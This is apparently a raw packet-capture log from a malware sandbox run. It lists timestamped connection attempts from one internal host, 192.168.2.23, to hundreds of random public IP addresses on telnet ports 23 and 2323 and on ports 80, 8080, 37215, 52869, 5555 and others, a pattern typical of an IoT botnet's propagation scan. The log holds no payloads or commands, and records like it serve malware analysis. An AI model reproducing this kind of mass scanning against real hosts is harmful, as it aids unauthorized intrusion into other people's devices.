                                                              Dec 11, 2024 00:43:25.409323931 CET2310200122.26.99.231192.168.2.23
                                                              Dec 11, 2024 00:43:25.409329891 CET1020023192.168.2.23135.81.217.159
                                                              Dec 11, 2024 00:43:25.409331083 CET1020023192.168.2.2345.203.213.72
                                                              Dec 11, 2024 00:43:25.409332991 CET2310200202.151.34.100192.168.2.23
                                                              Dec 11, 2024 00:43:25.409332991 CET1020023192.168.2.23183.45.190.73
                                                              Dec 11, 2024 00:43:25.409339905 CET102002323192.168.2.23197.237.9.178
                                                              Dec 11, 2024 00:43:25.409342051 CET2310200155.91.233.204192.168.2.23
                                                              Dec 11, 2024 00:43:25.409351110 CET2310200217.68.90.166192.168.2.23
                                                              Dec 11, 2024 00:43:25.409354925 CET2310200188.159.127.212192.168.2.23
                                                              Dec 11, 2024 00:43:25.409357071 CET1020023192.168.2.23122.26.99.231
                                                              Dec 11, 2024 00:43:25.409358978 CET2310200198.232.111.245192.168.2.23
                                                              Dec 11, 2024 00:43:25.409363031 CET1020023192.168.2.23202.151.34.100
                                                              Dec 11, 2024 00:43:25.409368038 CET232310200190.38.87.3192.168.2.23
                                                              Dec 11, 2024 00:43:25.409377098 CET1020023192.168.2.23155.91.233.204
                                                              Dec 11, 2024 00:43:25.409379005 CET1020023192.168.2.23217.68.90.166
                                                              Dec 11, 2024 00:43:25.409389019 CET1020023192.168.2.23198.232.111.245
                                                              Dec 11, 2024 00:43:25.409390926 CET1020023192.168.2.23188.159.127.212
                                                              Dec 11, 2024 00:43:25.409399986 CET102002323192.168.2.23190.38.87.3
                                                              Dec 11, 2024 00:43:25.409621954 CET3708881192.168.2.23108.204.57.85
                                                              Dec 11, 2024 00:43:25.409847021 CET2310200146.46.48.157192.168.2.23
                                                              Dec 11, 2024 00:43:25.409857988 CET2310200110.64.50.237192.168.2.23
                                                              Dec 11, 2024 00:43:25.409876108 CET231020044.236.206.238192.168.2.23
                                                              Dec 11, 2024 00:43:25.409885883 CET2310200133.223.0.145192.168.2.23
                                                              Dec 11, 2024 00:43:25.409892082 CET1020023192.168.2.23146.46.48.157
                                                              Dec 11, 2024 00:43:25.409893036 CET1020023192.168.2.23110.64.50.237
                                                              Dec 11, 2024 00:43:25.409913063 CET1020023192.168.2.23133.223.0.145
                                                              Dec 11, 2024 00:43:25.409914970 CET1020023192.168.2.2344.236.206.238
                                                              Dec 11, 2024 00:43:25.409975052 CET231020019.239.148.116192.168.2.23
                                                              Dec 11, 2024 00:43:25.409984112 CET2310200202.25.174.247192.168.2.23
                                                              Dec 11, 2024 00:43:25.409992933 CET2310200205.136.212.243192.168.2.23
                                                              Dec 11, 2024 00:43:25.410001993 CET2310200166.84.83.123192.168.2.23
                                                              Dec 11, 2024 00:43:25.410008907 CET2310200175.94.181.197192.168.2.23
                                                              Dec 11, 2024 00:43:25.410016060 CET1020023192.168.2.2319.239.148.116
                                                              Dec 11, 2024 00:43:25.410022020 CET1020023192.168.2.23202.25.174.247
                                                              Dec 11, 2024 00:43:25.410022020 CET1020023192.168.2.23205.136.212.243
                                                              Dec 11, 2024 00:43:25.410027027 CET231020061.186.177.185192.168.2.23
                                                              Dec 11, 2024 00:43:25.410032988 CET1020023192.168.2.23166.84.83.123
                                                              Dec 11, 2024 00:43:25.410037041 CET2310200167.113.108.150192.168.2.23
                                                              Dec 11, 2024 00:43:25.410037994 CET1020023192.168.2.23175.94.181.197
                                                              Dec 11, 2024 00:43:25.410046101 CET232310200142.3.30.223192.168.2.23
                                                              Dec 11, 2024 00:43:25.410067081 CET1020023192.168.2.23167.113.108.150
                                                              Dec 11, 2024 00:43:25.410068989 CET1020023192.168.2.2361.186.177.185
                                                              Dec 11, 2024 00:43:25.410075903 CET102002323192.168.2.23142.3.30.223
                                                              Dec 11, 2024 00:43:25.410094976 CET231020098.140.232.203192.168.2.23
                                                              Dec 11, 2024 00:43:25.410104036 CET2310200174.213.179.74192.168.2.23
                                                              Dec 11, 2024 00:43:25.410113096 CET2310200107.255.129.97192.168.2.23
                                                              Dec 11, 2024 00:43:25.410129070 CET1020023192.168.2.2398.140.232.203
                                                              Dec 11, 2024 00:43:25.410130024 CET1020023192.168.2.23174.213.179.74
                                                              Dec 11, 2024 00:43:25.410130978 CET2310200146.225.152.241192.168.2.23
                                                              Dec 11, 2024 00:43:25.410137892 CET1020023192.168.2.23107.255.129.97
                                                              Dec 11, 2024 00:43:25.410140038 CET23102004.240.106.112192.168.2.23
                                                              Dec 11, 2024 00:43:25.410151005 CET2310200114.74.129.174192.168.2.23
                                                              Dec 11, 2024 00:43:25.410157919 CET231020077.186.45.119192.168.2.23
                                                              Dec 11, 2024 00:43:25.410161972 CET1020023192.168.2.23146.225.152.241
                                                              Dec 11, 2024 00:43:25.410178900 CET1020023192.168.2.23114.74.129.174
                                                              Dec 11, 2024 00:43:25.410181999 CET1020023192.168.2.234.240.106.112
                                                              Dec 11, 2024 00:43:25.410183907 CET1020023192.168.2.2377.186.45.119
                                                              Dec 11, 2024 00:43:25.410288095 CET2310200204.113.25.86192.168.2.23
                                                              Dec 11, 2024 00:43:25.410296917 CET2310200206.17.113.63192.168.2.23
                                                              Dec 11, 2024 00:43:25.410305023 CET23102008.174.201.12192.168.2.23
                                                              Dec 11, 2024 00:43:25.410312891 CET23231020096.185.84.179192.168.2.23
                                                              Dec 11, 2024 00:43:25.410321951 CET231020017.240.168.217192.168.2.23
                                                              Dec 11, 2024 00:43:25.410327911 CET1020023192.168.2.23206.17.113.63
                                                              Dec 11, 2024 00:43:25.410331011 CET2310200165.117.230.145192.168.2.23
                                                              Dec 11, 2024 00:43:25.410326958 CET1020023192.168.2.23204.113.25.86
                                                              Dec 11, 2024 00:43:25.410340071 CET2310200222.177.36.234192.168.2.23
                                                              Dec 11, 2024 00:43:25.410342932 CET1020023192.168.2.238.174.201.12
                                                              Dec 11, 2024 00:43:25.410342932 CET1020023192.168.2.2317.240.168.217
                                                              Dec 11, 2024 00:43:25.410345078 CET102002323192.168.2.2396.185.84.179
                                                              Dec 11, 2024 00:43:25.410348892 CET2310200205.0.67.181192.168.2.23
                                                              Dec 11, 2024 00:43:25.410372019 CET1020023192.168.2.23165.117.230.145
                                                              Dec 11, 2024 00:43:25.410377026 CET1020023192.168.2.23222.177.36.234
                                                              Dec 11, 2024 00:43:25.410388947 CET1020023192.168.2.23205.0.67.181
                                                              Dec 11, 2024 00:43:25.410501957 CET2310200209.219.46.153192.168.2.23
                                                              Dec 11, 2024 00:43:25.410511017 CET2310200188.217.2.147192.168.2.23
                                                              Dec 11, 2024 00:43:25.410538912 CET1020023192.168.2.23188.217.2.147
                                                              Dec 11, 2024 00:43:25.410542965 CET1020023192.168.2.23209.219.46.153
                                                              Dec 11, 2024 00:43:25.410563946 CET497728080192.168.2.23156.219.119.169
                                                              Dec 11, 2024 00:43:25.410612106 CET231020073.230.141.115192.168.2.23
                                                              Dec 11, 2024 00:43:25.410620928 CET2310200169.226.181.127192.168.2.23
                                                              Dec 11, 2024 00:43:25.410630941 CET2310200223.75.147.105192.168.2.23
                                                              Dec 11, 2024 00:43:25.410640955 CET232310200198.1.87.187192.168.2.23
                                                              Dec 11, 2024 00:43:25.410650969 CET231020098.105.158.235192.168.2.23
                                                              Dec 11, 2024 00:43:25.410650969 CET1020023192.168.2.23169.226.181.127
                                                              Dec 11, 2024 00:43:25.410651922 CET1020023192.168.2.2373.230.141.115
                                                              Dec 11, 2024 00:43:25.410660028 CET1020023192.168.2.23223.75.147.105
                                                              Dec 11, 2024 00:43:25.410664082 CET2310200158.161.53.24192.168.2.23
                                                              Dec 11, 2024 00:43:25.410667896 CET102002323192.168.2.23198.1.87.187
                                                              Dec 11, 2024 00:43:25.410682917 CET231020088.202.224.24192.168.2.23
                                                              Dec 11, 2024 00:43:25.410687923 CET1020023192.168.2.2398.105.158.235
                                                              Dec 11, 2024 00:43:25.410691977 CET2310200210.123.54.200192.168.2.23
                                                              Dec 11, 2024 00:43:25.410691977 CET1020023192.168.2.23158.161.53.24
                                                              Dec 11, 2024 00:43:25.410702944 CET2310200165.131.28.16192.168.2.23
                                                              Dec 11, 2024 00:43:25.410706043 CET1020023192.168.2.2388.202.224.24
                                                              Dec 11, 2024 00:43:25.410727024 CET1020023192.168.2.23210.123.54.200
                                                              Dec 11, 2024 00:43:25.410739899 CET1020023192.168.2.23165.131.28.16
                                                              Dec 11, 2024 00:43:25.410767078 CET2310200133.141.204.228192.168.2.23
                                                              Dec 11, 2024 00:43:25.410777092 CET231020032.30.117.38192.168.2.23
                                                              Dec 11, 2024 00:43:25.410784006 CET231020066.32.174.143192.168.2.23
                                                              Dec 11, 2024 00:43:25.410803080 CET1020023192.168.2.23133.141.204.228
                                                              Dec 11, 2024 00:43:25.410809040 CET1020023192.168.2.2332.30.117.38
                                                              Dec 11, 2024 00:43:25.410818100 CET1020023192.168.2.2366.32.174.143
                                                              Dec 11, 2024 00:43:25.411137104 CET469467574192.168.2.23179.7.67.81
                                                              Dec 11, 2024 00:43:25.412044048 CET4826837215192.168.2.23112.98.35.148
                                                              Dec 11, 2024 00:43:25.412962914 CET5809480192.168.2.2385.33.9.199
                                                              Dec 11, 2024 00:43:25.414958954 CET466988080192.168.2.23189.43.129.135
                                                              Dec 11, 2024 00:43:25.415899992 CET3421880192.168.2.23177.17.55.150
                                                              Dec 11, 2024 00:43:25.416471958 CET404128443192.168.2.23159.70.79.45
                                                              Dec 11, 2024 00:43:25.417046070 CET452047574192.168.2.23143.188.193.23
                                                              Dec 11, 2024 00:43:25.417618036 CET4211080192.168.2.23122.206.154.24
                                                              Dec 11, 2024 00:43:25.418215036 CET5091449152192.168.2.23112.228.153.78
                                                              Dec 11, 2024 00:43:25.418775082 CET389648080192.168.2.23209.11.170.225
                                                              Dec 11, 2024 00:43:25.419353962 CET3345680192.168.2.2342.11.171.249
                                                              Dec 11, 2024 00:43:25.420289993 CET368328443192.168.2.2316.43.0.154
                                                              Dec 11, 2024 00:43:25.421608925 CET448605555192.168.2.2348.82.32.47
                                                              Dec 11, 2024 00:43:25.422524929 CET4779852869192.168.2.23189.56.155.181
                                                              Dec 11, 2024 00:43:25.423060894 CET339548080192.168.2.2372.176.20.122
                                                              Dec 11, 2024 00:43:25.423595905 CET5864680192.168.2.2339.61.64.138
                                                              Dec 11, 2024 00:43:25.424164057 CET5464637215192.168.2.23198.143.163.205
                                                              Dec 11, 2024 00:43:25.424700022 CET462167574192.168.2.2318.162.246.11
                                                              Dec 11, 2024 00:43:25.425241947 CET4072437215192.168.2.23168.97.155.16
                                                              Dec 11, 2024 00:43:25.425852060 CET5902080192.168.2.23123.164.227.106
                                                              Dec 11, 2024 00:43:25.427491903 CET547967574192.168.2.23101.152.156.195
                                                              Dec 11, 2024 00:43:25.430402994 CET342608443192.168.2.23113.130.103.12
                                                              Dec 11, 2024 00:43:25.430902958 CET3994880192.168.2.23151.190.149.220
                                                              Dec 11, 2024 00:43:25.431423903 CET5660080192.168.2.23177.244.168.82
                                                              Dec 11, 2024 00:43:25.432307959 CET541407574192.168.2.23217.111.105.12
                                                              Dec 11, 2024 00:43:25.432822943 CET5399052869192.168.2.2355.235.209.206
                                                              Dec 11, 2024 00:43:25.433362007 CET514968080192.168.2.23191.0.180.39
                                                              Dec 11, 2024 00:43:25.433876991 CET3656681192.168.2.235.215.80.182
                                                              Dec 11, 2024 00:43:25.434410095 CET3564280192.168.2.2330.28.21.163
                                                              Dec 11, 2024 00:43:25.435266018 CET601128080192.168.2.23185.183.219.218
                                                              Dec 11, 2024 00:43:25.435771942 CET3819280192.168.2.23209.97.96.87
                                                              Dec 11, 2024 00:43:25.436290979 CET410508080192.168.2.2372.239.95.188
                                                              Dec 11, 2024 00:43:25.436804056 CET4938680192.168.2.23120.56.66.31
                                                              Dec 11, 2024 00:43:25.437342882 CET484928080192.168.2.23212.233.147.84
                                                              Dec 11, 2024 00:43:25.438252926 CET367508080192.168.2.23209.126.186.28
                                                              Dec 11, 2024 00:43:25.438771963 CET3993480192.168.2.23214.93.96.111
                                                              Dec 11, 2024 00:43:25.439671040 CET598368080192.168.2.2396.189.1.173
                                                              Dec 11, 2024 00:43:25.440186977 CET408508080192.168.2.2343.201.207.218
                                                              Dec 11, 2024 00:43:25.442174911 CET4060280192.168.2.2351.167.167.228
                                                              Dec 11, 2024 00:43:25.442701101 CET3747481192.168.2.23181.61.51.162
                                                              Dec 11, 2024 00:43:25.443226099 CET3816637215192.168.2.23115.104.106.129
                                                              Dec 11, 2024 00:43:25.444139957 CET608228080192.168.2.2320.39.219.19
                                                              Dec 11, 2024 00:43:25.445029974 CET5755852869192.168.2.23162.236.32.249
                                                              Dec 11, 2024 00:43:25.445552111 CET353068080192.168.2.23208.152.49.223
                                                              Dec 11, 2024 00:43:25.446075916 CET4731449152192.168.2.23123.102.234.72
                                                              Dec 11, 2024 00:43:25.446630955 CET5107680192.168.2.2366.42.44.190
                                                              Dec 11, 2024 00:43:25.447155952 CET3537037215192.168.2.236.62.44.57
                                                              Dec 11, 2024 00:43:25.447702885 CET417128080192.168.2.2386.251.237.48
                                                              Dec 11, 2024 00:43:25.448246956 CET3343280192.168.2.2351.174.206.232
                                                              Dec 11, 2024 00:43:25.448756933 CET3692449152192.168.2.23205.35.178.129
                                                              Dec 11, 2024 00:43:25.449640989 CET5702680192.168.2.23172.64.228.241
                                                              Dec 11, 2024 00:43:25.453802109 CET529468080192.168.2.23212.91.206.34
                                                              Dec 11, 2024 00:43:25.454308987 CET5539880192.168.2.23202.164.27.18
                                                              Dec 11, 2024 00:43:25.454828024 CET403728080192.168.2.2351.13.64.150
                                                              Dec 11, 2024 00:43:25.455333948 CET4259680192.168.2.23185.141.241.150
                                                              Dec 11, 2024 00:43:25.455885887 CET512587574192.168.2.23118.212.30.183
                                                              Dec 11, 2024 00:43:25.460103989 CET5342880192.168.2.2337.60.247.23
                                                              Dec 11, 2024 00:43:25.460666895 CET3420852869192.168.2.23143.2.177.209
                                                              Dec 11, 2024 00:43:25.461225986 CET374628443192.168.2.23103.219.147.163
                                                              Dec 11, 2024 00:43:25.462106943 CET5910681192.168.2.23159.214.150.100
                                                              Dec 11, 2024 00:43:25.462635040 CET392548080192.168.2.23190.64.122.95
                                                              Dec 11, 2024 00:43:25.463157892 CET4394849152192.168.2.2327.192.124.115
                                                              Dec 11, 2024 00:43:25.463675976 CET5565680192.168.2.23115.15.94.51
                                                              Dec 11, 2024 00:43:25.464217901 CET445968080192.168.2.23199.69.206.204
                                                              Dec 11, 2024 00:43:25.464737892 CET515288080192.168.2.23172.218.152.109
                                                              Dec 11, 2024 00:43:25.465985060 CET4844252869192.168.2.236.128.71.141
                                                              Dec 11, 2024 00:43:25.469052076 CET353207574192.168.2.238.91.128.74
                                                              Dec 11, 2024 00:43:25.469562054 CET455948080192.168.2.2390.80.231.5
                                                              Dec 11, 2024 00:43:25.470424891 CET5523281192.168.2.23151.187.14.197
                                                              Dec 11, 2024 00:43:25.470932961 CET429325555192.168.2.23149.222.209.32
                                                              Dec 11, 2024 00:43:25.471416950 CET4160680192.168.2.23132.222.145.237
                                                              Dec 11, 2024 00:43:25.471892118 CET5042249152192.168.2.23163.58.204.45
                                                              Dec 11, 2024 00:43:25.472419024 CET370048443192.168.2.23163.170.235.110
                                                              Dec 11, 2024 00:43:25.472932100 CET6070680192.168.2.23220.39.43.69
                                                              Dec 11, 2024 00:43:25.473479986 CET565688080192.168.2.23214.117.146.14
                                                              Dec 11, 2024 00:43:25.473995924 CET4594849152192.168.2.2375.187.60.175
                                                              Dec 11, 2024 00:43:25.474514961 CET3483681192.168.2.23200.214.225.237
                                                              Dec 11, 2024 00:43:25.475413084 CET4540837215192.168.2.237.11.145.117
                                                              Dec 11, 2024 00:43:25.475444078 CET564962323192.168.2.2392.8.54.109
                                                              Dec 11, 2024 00:43:25.475450993 CET5591223192.168.2.23188.34.65.40
                                                              Dec 11, 2024 00:43:25.475452900 CET5823823192.168.2.2375.52.243.161
                                                              Dec 11, 2024 00:43:25.475452900 CET4662623192.168.2.2375.103.114.187
                                                              Dec 11, 2024 00:43:25.475455999 CET4458023192.168.2.23150.95.151.152
                                                              Dec 11, 2024 00:43:25.475471020 CET4555223192.168.2.23222.222.175.156
                                                              Dec 11, 2024 00:43:25.475471020 CET3785423192.168.2.2327.254.114.235
                                                              Dec 11, 2024 00:43:25.475478888 CET4659223192.168.2.232.98.222.149
                                                              Dec 11, 2024 00:43:25.475485086 CET5877823192.168.2.23222.118.56.227
                                                              Dec 11, 2024 00:43:25.475486994 CET344922323192.168.2.23194.10.212.237
                                                              Dec 11, 2024 00:43:25.475493908 CET5526423192.168.2.23102.71.47.157
                                                              Dec 11, 2024 00:43:25.475496054 CET5026623192.168.2.2357.161.189.10
                                                              Dec 11, 2024 00:43:25.475505114 CET5519423192.168.2.23193.159.232.246
                                                              Dec 11, 2024 00:43:25.475507021 CET4813623192.168.2.23109.145.227.139
                                                              Dec 11, 2024 00:43:25.475509882 CET503882323192.168.2.2373.184.60.91
                                                              Dec 11, 2024 00:43:25.475519896 CET5882423192.168.2.2379.16.207.77
                                                              Dec 11, 2024 00:43:25.475522041 CET5425023192.168.2.2314.165.166.7
                                                              Dec 11, 2024 00:43:25.475528955 CET3727023192.168.2.23159.134.39.155
                                                              Dec 11, 2024 00:43:25.475533962 CET5375823192.168.2.23205.141.196.100
                                                              Dec 11, 2024 00:43:25.475539923 CET3808223192.168.2.2317.34.190.132
                                                              Dec 11, 2024 00:43:25.475543022 CET5171623192.168.2.2336.195.76.248
                                                              Dec 11, 2024 00:43:25.475548983 CET3658423192.168.2.23179.33.51.146
                                                              Dec 11, 2024 00:43:25.475553989 CET5495023192.168.2.2392.89.134.111
                                                              Dec 11, 2024 00:43:25.475554943 CET4805823192.168.2.23111.240.200.106
                                                              Dec 11, 2024 00:43:25.475568056 CET525402323192.168.2.23119.75.28.81
                                                              Dec 11, 2024 00:43:25.475570917 CET5983823192.168.2.2339.161.38.128
                                                              Dec 11, 2024 00:43:25.476044893 CET5627280192.168.2.2399.49.231.17
                                                              Dec 11, 2024 00:43:25.476943016 CET395447574192.168.2.23156.178.202.87
                                                              Dec 11, 2024 00:43:25.477478981 CET596025555192.168.2.2317.95.28.113
                                                              Dec 11, 2024 00:43:25.478725910 CET4228480192.168.2.23107.48.156.250
                                                              Dec 11, 2024 00:43:25.479248047 CET4499080192.168.2.23130.39.44.114
                                                              Dec 11, 2024 00:43:25.480526924 CET531728080192.168.2.2348.2.86.155
                                                              Dec 11, 2024 00:43:25.481416941 CET347185555192.168.2.23208.214.127.186
                                                              Dec 11, 2024 00:43:25.481899023 CET463885555192.168.2.23206.226.32.55
                                                              Dec 11, 2024 00:43:25.482796907 CET455785555192.168.2.23221.236.95.152
                                                              Dec 11, 2024 00:43:25.483304024 CET4385880192.168.2.23189.73.164.229
                                                              Dec 11, 2024 00:43:25.483829021 CET607625555192.168.2.23104.238.195.225
                                                              Dec 11, 2024 00:43:25.484344959 CET445285555192.168.2.23142.123.173.47
                                                              Dec 11, 2024 00:43:25.484843016 CET3440049152192.168.2.2353.209.190.15
                                                              Dec 11, 2024 00:43:25.485363960 CET358448443192.168.2.2394.132.127.156
                                                              Dec 11, 2024 00:43:25.486241102 CET476808443192.168.2.2370.87.49.190
                                                              Dec 11, 2024 00:43:25.486757994 CET4187080192.168.2.23199.201.219.195
                                                              Dec 11, 2024 00:43:25.487272024 CET3528280192.168.2.2354.218.97.200
                                                              Dec 11, 2024 00:43:25.487781048 CET574628080192.168.2.2331.248.105.227
                                                              Dec 11, 2024 00:43:25.488286018 CET595588080192.168.2.23189.69.246.246
                                                              Dec 11, 2024 00:43:25.488809109 CET472527574192.168.2.2392.252.108.143
                                                              Dec 11, 2024 00:43:25.489276886 CET561087574192.168.2.23142.187.243.214
                                                              Dec 11, 2024 00:43:25.489784002 CET4031452869192.168.2.23142.154.250.31
                                                              Dec 11, 2024 00:43:25.490272999 CET6087852869192.168.2.2313.8.252.33
                                                              Dec 11, 2024 00:43:25.493669033 CET3644052869192.168.2.2387.226.73.10
                                                              Dec 11, 2024 00:43:25.494188070 CET516087574192.168.2.2324.184.40.139
                                                              Dec 11, 2024 00:43:25.494708061 CET4165680192.168.2.23222.67.158.169
                                                              Dec 11, 2024 00:43:25.495215893 CET5044037215192.168.2.23215.88.57.68
                                                              Dec 11, 2024 00:43:25.495704889 CET4696880192.168.2.2342.174.36.196
                                                              Dec 11, 2024 00:43:25.496239901 CET5492452869192.168.2.23131.98.241.18
                                                              Dec 11, 2024 00:43:25.496751070 CET3751452869192.168.2.233.139.131.102
                                                              Dec 11, 2024 00:43:25.497277021 CET372988080192.168.2.2323.204.143.232
                                                              Dec 11, 2024 00:43:25.497792006 CET3469449152192.168.2.23157.191.130.64
                                                              Dec 11, 2024 00:43:25.498677969 CET464407574192.168.2.23151.75.41.0
                                                              Dec 11, 2024 00:43:25.499193907 CET505808080192.168.2.23181.88.218.129
                                                              Dec 11, 2024 00:43:25.499697924 CET346487574192.168.2.23214.40.211.208
                                                              Dec 11, 2024 00:43:25.500232935 CET555347574192.168.2.2375.89.54.172
                                                              Dec 11, 2024 00:43:25.500750065 CET3942680192.168.2.23175.74.235.217
                                                              Dec 11, 2024 00:43:25.506357908 CET587948080192.168.2.2357.103.185.124
                                                              Dec 11, 2024 00:43:25.508335114 CET5375880192.168.2.23179.118.33.80
                                                              Dec 11, 2024 00:43:25.508842945 CET3714481192.168.2.23178.197.52.234
                                                              Dec 11, 2024 00:43:25.509402037 CET4054280192.168.2.2399.51.156.139
                                                              Dec 11, 2024 00:43:25.509927988 CET558105555192.168.2.2384.182.41.36
                                                              Dec 11, 2024 00:43:25.510458946 CET3550280192.168.2.23112.228.26.77
                                                              Dec 11, 2024 00:43:25.511343956 CET413948443192.168.2.23221.214.120.56
                                                              Dec 11, 2024 00:43:25.511837959 CET547168080192.168.2.23145.190.54.121
                                                              Dec 11, 2024 00:43:25.512090921 CET804142276.225.145.132192.168.2.23
                                                              Dec 11, 2024 00:43:25.512137890 CET4142280192.168.2.2376.225.145.132
                                                              Dec 11, 2024 00:43:25.512144089 CET8041852173.143.115.27192.168.2.23
                                                              Dec 11, 2024 00:43:25.512183905 CET4185280192.168.2.23173.143.115.27
                                                              Dec 11, 2024 00:43:25.512326956 CET5641852869192.168.2.23113.126.128.90
                                                              Dec 11, 2024 00:43:25.512805939 CET4675680192.168.2.238.195.151.225
                                                              Dec 11, 2024 00:43:25.513870001 CET372154820843.157.71.205192.168.2.23
                                                              Dec 11, 2024 00:43:25.513911963 CET4820837215192.168.2.2343.157.71.205
                                                              Dec 11, 2024 00:43:25.514883041 CET8040520147.230.138.105192.168.2.23
                                                              Dec 11, 2024 00:43:25.514911890 CET4915248384103.83.208.93192.168.2.23
                                                              Dec 11, 2024 00:43:25.514919043 CET4052080192.168.2.23147.230.138.105
                                                              Dec 11, 2024 00:43:25.514960051 CET4838449152192.168.2.23103.83.208.93
                                                              Dec 11, 2024 00:43:25.515655041 CET803796666.158.237.47192.168.2.23
                                                              Dec 11, 2024 00:43:25.515691042 CET3796680192.168.2.2366.158.237.47
                                                              Dec 11, 2024 00:43:25.515826941 CET808038896104.233.49.104192.168.2.23
                                                              Dec 11, 2024 00:43:25.515871048 CET388968080192.168.2.23104.233.49.104
                                                              Dec 11, 2024 00:43:25.515888929 CET5904237215192.168.2.23184.123.14.48
                                                              Dec 11, 2024 00:43:25.516772032 CET555548608194.65.247.231192.168.2.23
                                                              Dec 11, 2024 00:43:25.516807079 CET486085555192.168.2.23194.65.247.231
                                                              Dec 11, 2024 00:43:25.517113924 CET5824037215192.168.2.23208.96.70.42
                                                              Dec 11, 2024 00:43:25.517651081 CET404728443192.168.2.23197.221.44.209
                                                              Dec 11, 2024 00:43:25.518192053 CET382907574192.168.2.23105.20.84.160
                                                              Dec 11, 2024 00:43:25.518661022 CET5365880192.168.2.23156.166.162.152
                                                              Dec 11, 2024 00:43:25.519535065 CET591728080192.168.2.231.30.6.79
                                                              Dec 11, 2024 00:43:25.520032883 CET4186880192.168.2.234.0.175.132
                                                              Dec 11, 2024 00:43:25.521987915 CET4089680192.168.2.2378.69.38.157
                                                              Dec 11, 2024 00:43:25.522496939 CET5158881192.168.2.2397.54.18.199
                                                              Dec 11, 2024 00:43:25.523369074 CET597208080192.168.2.23104.87.39.73
                                                              Dec 11, 2024 00:43:25.523916960 CET3496880192.168.2.239.177.77.216
                                                              Dec 11, 2024 00:43:25.524432898 CET375488080192.168.2.23113.63.154.87
                                                              Dec 11, 2024 00:43:25.524956942 CET350585555192.168.2.23198.54.10.70
                                                              Dec 11, 2024 00:43:25.525470972 CET5104637215192.168.2.23128.71.216.213
                                                              Dec 11, 2024 00:43:25.525860071 CET75745534268.206.127.40192.168.2.23
                                                              Dec 11, 2024 00:43:25.525904894 CET553427574192.168.2.2368.206.127.40
                                                              Dec 11, 2024 00:43:25.525912046 CET80803336616.55.28.94192.168.2.23
                                                              Dec 11, 2024 00:43:25.525929928 CET80803462434.49.97.215192.168.2.23
                                                              Dec 11, 2024 00:43:25.525938034 CET8037826120.154.2.119192.168.2.23
                                                              Dec 11, 2024 00:43:25.525952101 CET333668080192.168.2.2316.55.28.94
                                                              Dec 11, 2024 00:43:25.525974035 CET3782680192.168.2.23120.154.2.119
                                                              Dec 11, 2024 00:43:25.525974989 CET346248080192.168.2.2334.49.97.215
                                                              Dec 11, 2024 00:43:25.629025936 CET4142280192.168.2.2376.225.145.132
                                                              Dec 11, 2024 00:43:25.629070044 CET4185280192.168.2.23173.143.115.27
                                                              Dec 11, 2024 00:43:25.630196095 CET4820837215192.168.2.2343.157.71.205
                                                              Dec 11, 2024 00:43:25.630228996 CET4052080192.168.2.23147.230.138.105
                                                              Dec 11, 2024 00:43:25.630273104 CET4838449152192.168.2.23103.83.208.93
                                                              Dec 11, 2024 00:43:25.630307913 CET3796680192.168.2.2366.158.237.47
                                                              Dec 11, 2024 00:43:25.630325079 CET388968080192.168.2.23104.233.49.104
                                                              Dec 11, 2024 00:43:25.630723953 CET486085555192.168.2.23194.65.247.231
                                                              Dec 11, 2024 00:43:25.630749941 CET553427574192.168.2.2368.206.127.40
                                                              Dec 11, 2024 00:43:25.631135941 CET333668080192.168.2.2316.55.28.94
                                                              Dec 11, 2024 00:43:25.631877899 CET346248080192.168.2.2334.49.97.215
                                                              Dec 11, 2024 00:43:25.633505106 CET8034218177.17.55.150192.168.2.23
                                                              Dec 11, 2024 00:43:25.633519888 CET805864639.61.64.138192.168.2.23
                                                              Dec 11, 2024 00:43:25.633527994 CET8038192209.97.96.87192.168.2.23
                                                              Dec 11, 2024 00:43:25.633537054 CET80806082220.39.219.19192.168.2.23
                                                              Dec 11, 2024 00:43:25.633546114 CET8042596185.141.241.150192.168.2.23
                                                              Dec 11, 2024 00:43:25.633554935 CET8055656115.15.94.51192.168.2.23
                                                              Dec 11, 2024 00:43:25.633563042 CET3421880192.168.2.23177.17.55.150
                                                              Dec 11, 2024 00:43:25.633569956 CET5864680192.168.2.2339.61.64.138
                                                              Dec 11, 2024 00:43:25.633582115 CET37215454087.11.145.117192.168.2.23
                                                              Dec 11, 2024 00:43:25.633590937 CET555560762104.238.195.225192.168.2.23
                                                              Dec 11, 2024 00:43:25.633599043 CET804696842.174.36.196192.168.2.23
                                                              Dec 11, 2024 00:43:25.633606911 CET80805879457.103.185.124192.168.2.23
                                                              Dec 11, 2024 00:43:25.633616924 CET608228080192.168.2.2320.39.219.19
                                                              Dec 11, 2024 00:43:25.633619070 CET3819280192.168.2.23209.97.96.87
                                                              Dec 11, 2024 00:43:25.633619070 CET4259680192.168.2.23185.141.241.150
                                                              Dec 11, 2024 00:43:25.633619070 CET5565680192.168.2.23115.15.94.51
                                                              Dec 11, 2024 00:43:25.633626938 CET4696880192.168.2.2342.174.36.196
                                                              Dec 11, 2024 00:43:25.633636951 CET4540837215192.168.2.237.11.145.117
                                                              Dec 11, 2024 00:43:25.633641005 CET607625555192.168.2.23104.238.195.225
                                                              Dec 11, 2024 00:43:25.633649111 CET587948080192.168.2.2357.103.185.124
                                                              Dec 11, 2024 00:43:25.633730888 CET3782680192.168.2.23120.154.2.119
                                                              Dec 11, 2024 00:43:25.636611938 CET3721559042184.123.14.48192.168.2.23
                                                              Dec 11, 2024 00:43:25.636651039 CET5904237215192.168.2.23184.123.14.48
                                                              Dec 11, 2024 00:43:25.644192934 CET808059720104.87.39.73192.168.2.23
                                                              Dec 11, 2024 00:43:25.644254923 CET597208080192.168.2.23104.87.39.73
                                                              Dec 11, 2024 00:43:25.731420994 CET4597823192.168.2.23154.164.127.158
                                                              Dec 11, 2024 00:43:25.731420994 CET4992623192.168.2.23158.82.113.244
                                                              Dec 11, 2024 00:43:25.731427908 CET5876223192.168.2.23221.204.83.127
                                                              Dec 11, 2024 00:43:25.731427908 CET5159223192.168.2.2346.32.201.243
                                                              Dec 11, 2024 00:43:25.731427908 CET3829423192.168.2.23206.206.213.254
                                                              Dec 11, 2024 00:43:25.731427908 CET6086023192.168.2.2368.237.74.148
                                                              Dec 11, 2024 00:43:25.731441021 CET352581023192.168.2.23154.188.72.149
                                                              Dec 11, 2024 00:43:25.731441021 CET400081023192.168.2.23135.115.123.97
                                                              Dec 11, 2024 00:43:25.731441975 CET4809223192.168.2.23112.244.146.48
                                                              Dec 11, 2024 00:43:25.731450081 CET5613223192.168.2.2381.199.35.162
                                                              Dec 11, 2024 00:43:25.731450081 CET4405023192.168.2.231.215.230.248
                                                              Dec 11, 2024 00:43:25.731453896 CET5083623192.168.2.23143.25.242.58
                                                              Dec 11, 2024 00:43:25.731453896 CET414262323192.168.2.23103.206.41.98
